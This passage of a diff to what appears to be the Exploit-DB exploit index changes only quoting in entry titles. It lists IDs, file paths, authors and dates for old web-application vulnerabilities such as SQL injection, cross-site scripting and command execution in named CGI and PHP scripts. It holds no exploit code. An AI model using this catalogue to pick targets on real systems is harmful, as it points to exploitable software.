Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0 -22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 +22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - 'Admin.cgi' Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 22744,platforms/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,asp,webapps,0 22746,platforms/asp/webapps/22746.txt,"Maxwebportal 1.30 - 'search.asp?Search' Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps,0 22747,platforms/asp/webapps/22747.txt,"Maxwebportal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 @@ -27125,7 +27127,7 @@ id,file,description,date,author,platform,type,port 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 - Full Path Disclosure",2003-08-11,"Zone-h Security Team",php,webapps,0 23020,platforms/php/webapps/23020.txt,"HostAdmin - Full Path Disclosure",2003-08-12,G00db0y,php,webapps,0 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0 -23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 +23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - 'User.cgi' Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 @@ -27180,7 +27182,7 @@ id,file,description,date,author,platform,type,port 23207,platforms/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 - search Cross-Site Scripting",2003-10-01,Ezhilan,php,webapps,0 23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal Information Disclosure",2003-10-01,"Gama Sec",php,webapps,0 23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 -23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - Message.cgi Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 +23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23217,platforms/cgi/webapps/23217.txt,"Divine Content Server 5.0 - Error Page Cross-Site Scripting",2003-10-03,valgasu,cgi,webapps,0 23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Inclusion",2003-10-04,frog,php,webapps,0 23219,platforms/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,php,webapps,0 @@ -27237,7 +27239,7 @@ id,file,description,date,author,platform,type,port 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",cgi,webapps,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0 23381,platforms/php/webapps/23381.txt,"PHPWebFileManager 2.0 - 'index.php' Directory Traversal",2003-11-17,"RusH security team",php,webapps,0 -23395,platforms/cgi/webapps/23395.txt,"CommerceSQL Shopping Cart 2.2 - index.cgi Directory Traversal",2003-11-24,"Mariusz Ciesla",cgi,webapps,0 +23395,platforms/cgi/webapps/23395.txt,"CommerceSQL Shopping Cart 2.2 - 'index.cgi' Directory Traversal",2003-11-24,"Mariusz Ciesla",cgi,webapps,0 23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 23403,platforms/php/webapps/23403.pl,"My_eGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps,0 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure",2003-12-01,scrap,php,webapps,0 @@ -27302,7 +27304,7 @@ id,file,description,date,author,platform,type,port 23691,platforms/php/webapps/23691.txt,"vBulletin 3.0 - 'search.php' Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0 -23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal",2004-01-10,FIST,cgi,webapps,0 +23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,php,webapps,0 @@ -27364,7 +27366,7 @@ id,file,description,date,author,platform,type,port 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0 23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - 'advSearch_h.asp' Multiple SQL Injections",2004-02-16,"Nick Gudov",asp,webapps,0 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - 'Custva.asp?redirectUrl' Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0 -23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 +23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - 'gotopage.cgi' Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - 'Quote' SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php?id' SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 @@ -27650,7 +27652,7 @@ id,file,description,date,author,platform,type,port 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 -24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - ICQ.cgi Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 +24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - 'ICQ.cgi' Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - Remote File Inclusion",2004-07-19,"Adam Simuntis",php,webapps,0 24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps,0 @@ -27713,7 +27715,7 @@ id,file,description,date,author,platform,type,port 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 - 'News.mdb' Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 24399,platforms/php/webapps/24399.txt,"PhotoADay - 'Pad_selected' Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 -24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 +24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 24403,platforms/php/webapps/24403.txt,"eGroupWare 1.0 Calendar Module - 'date' Cross-Site Scripting",2004-08-23,"Joxean Koret",php,webapps,0 24401,platforms/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal",2004-08-23,bashis,cgi,webapps,0 24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 @@ -28391,7 +28393,7 @@ id,file,description,date,author,platform,type,port 25591,platforms/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,cgi,webapps,0 25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting",2005-05-03,"arron ward",php,webapps,0 -25594,platforms/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - User.cgi Cross-Site Scripting",2005-05-04,"Nathan House",cgi,webapps,0 +25594,platforms/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - 'User.cgi' Cross-Site Scripting",2005-05-04,"Nathan House",cgi,webapps,0 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Defer.asp' SQL Injection",2005-05-04,Zinho,asp,webapps,0 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Details.asp' SQL Injection",2005-05-04,Zinho,asp,webapps,0 25599,platforms/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 @@ -28414,7 +28416,7 @@ id,file,description,date,author,platform,type,port 25618,platforms/php/webapps/25618.txt,"MidiCart PHP - 'Search_List.php?SearchString' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25619,platforms/php/webapps/25619.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25620,platforms/php/webapps/25620.txt,"MidiCart PHP - 'Item_List.php?MainGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 -25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 +25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - 'Admin.cgi?EntryID' Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,php,webapps,0 25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,jsp,webapps,0 25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php?Entry' SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 @@ -28584,7 +28586,7 @@ id,file,description,date,author,platform,type,port 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net (Multiple Scripts) - Remote Command Execution",2005-08-21,sullo@cirt.net,cgi,webapps,0 -26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 +26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 - 'AddItem.asp' SQL Injection",2005-08-21,SmOk3,asp,webapps,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25854,platforms/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 @@ -28663,7 +28665,7 @@ id,file,description,date,author,platform,type,port 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 - 'CID' Cross-Site Scripting",2005-07-04,Easyex,php,webapps,0 25937,platforms/php/webapps/25937.txt,"Plague News System 0.7 - 'delete.php' Access Restriction Bypass",2005-07-04,Easyex,php,webapps,0 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 -25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 +25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - 'Read.cgi' Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0 25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0 @@ -28671,7 +28673,7 @@ id,file,description,date,author,platform,type,port 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps,0 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",php,webapps,0 -25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 - Kaiseki.cgi Remote Command Execution",2005-07-07,blahplok,cgi,webapps,0 +25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 - 'Kaiseki.cgi' Remote Command Execution",2005-07-07,blahplok,cgi,webapps,0 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",asp,webapps,0 25954,platforms/php/webapps/25954.txt,"phpAuction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0 @@ -29080,7 +29082,7 @@ id,file,description,date,author,platform,type,port 26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe?tsurl' Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - 'ts.cgi' File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 @@ -29254,7 +29256,7 @@ id,file,description,date,author,platform,type,port 26713,platforms/php/webapps/26713.txt,"PHPYellowTM 5.33 - 'search_result.php?haystack' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26714,platforms/php/webapps/26714.txt,"PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 - 'Property.php' SQL Injection",2005-11-05,r0t3d3Vil,php,webapps,0 -26716,platforms/cgi/webapps/26716.txt,"Easy Search System 1.1 - search.cgi Cross-Site Scripting",2005-12-05,r0t,cgi,webapps,0 +26716,platforms/cgi/webapps/26716.txt,"Easy Search System 1.1 - 'search.cgi' Cross-Site Scripting",2005-12-05,r0t,cgi,webapps,0 26717,platforms/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'view.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 26718,platforms/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'index.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 26719,platforms/php/webapps/26719.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'viewbrands.php?bid' SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 @@ -29360,7 +29362,7 @@ id,file,description,date,author,platform,type,port 26848,platforms/cgi/webapps/26848.txt,"Soft4e ECW-Cart 2.0.3 - Cross-Site Scripting Multiple Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26849,platforms/cgi/webapps/26849.txt,"ECTOOLS Onlineshop 1.0 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26850,platforms/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26851,platforms/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 - CP-APP.cgi Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 +26851,platforms/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 - 'CP-APP.cgi' Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26852,platforms/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Cross-Site Scripting Multiple Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26853,platforms/php/webapps/26853.txt,"EZDatabase 2.1.2 - 'index.php?p' Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 26854,platforms/php/webapps/26854.txt,"EZDatabase 2.1.2 - 'index.php?db_id' SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 @@ -29836,7 +29838,7 @@ id,file,description,date,author,platform,type,port 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 - APWC_Win_Main.jsp Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 -27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board - Mb.cgi SQL Injection",2006-03-24,kspecial,cgi,webapps,0 +27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board - 'Mb.cgi' SQL Injection",2006-03-24,kspecial,cgi,webapps,0 27465,platforms/php/webapps/27465.txt,"VihorDesign - 'index.php' Cross-Site Scripting",2006-03-24,botan,php,webapps,0 27466,platforms/php/webapps/27466.txt,"VihorDesign - 'index.php' Remote File Inclusion",2006-03-24,botan,php,webapps,0 27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 - 'index.php' Cross-Site Scripting",2006-03-27,botan,php,webapps,0 @@ -29858,7 +29860,7 @@ id,file,description,date,author,platform,type,port 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 -27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 +27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - 'Bol.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 27489,platforms/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Cross-Site Scripting Multiple Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - 'Accountlogon.cfm' Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 27491,platforms/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injections",2006-03-27,r0t,cfm,webapps,0 @@ -29911,7 +29913,7 @@ id,file,description,date,author,platform,type,port 27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 - 'edit.jsp' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,jsp,webapps,0 27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - 'visview.php?_GET['cid']' SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,cgi,webapps,0 -27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - /mods/calendar/index.cgi?vsSD' Cross-Site Scripting",2006-04-03,r0t,cgi,webapps,0 +27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - '/mods/calendar/index.cgi?vsSD' Cross-Site Scripting",2006-04-03,r0t,cgi,webapps,0 27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 27567,platforms/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,php,webapps,0 27570,platforms/php/webapps/27570.txt,"Chucky A. Ivey N.T. 1.1 - 'index.php' Multiple HTML Injection Vulnerabilities",2006-04-05,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -30013,7 +30015,7 @@ id,file,description,date,author,platform,type,port 27693,platforms/php/webapps/27693.txt,"otalCalendar - 'about.php?inc_dir' Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - 'sendim.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 -27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 +27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - 'imessage.cgi?Username' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - 'login.cgi?Password' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 @@ -30161,7 +30163,7 @@ id,file,description,date,author,platform,type,port 27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0 27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0 -27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection",2006-05-18,l0om,cgi,webapps,0 +27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - 'Lshop.cgi' SQL Injection",2006-05-18,l0om,cgi,webapps,0 27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - 'default.asp?action' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 - 'profile.asp?get' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - 'default.asp' SQL Injection",2006-05-19,omnipresent,asp,webapps,0 @@ -30720,7 +30722,7 @@ id,file,description,date,author,platform,type,port 28732,platforms/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 28733,platforms/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 -29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 +29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - 'SurgeFTPMGR.cgi' Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - 'ProductDetails.asp' SQL Injection",2006-12-11,ajann,asp,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 @@ -31864,7 +31866,7 @@ id,file,description,date,author,platform,type,port 30436,platforms/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 -30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - Webevent.cgi Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 +30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - 'Webevent.cgi' Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30442,platforms/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"WordPress Theme Persuasion 2.x - Arbitrary File Download / File Deletion",2013-12-23,"Interference Security",php,webapps,80 30445,platforms/php/webapps/30445.txt,"Joomla! Component Tour de France Pool 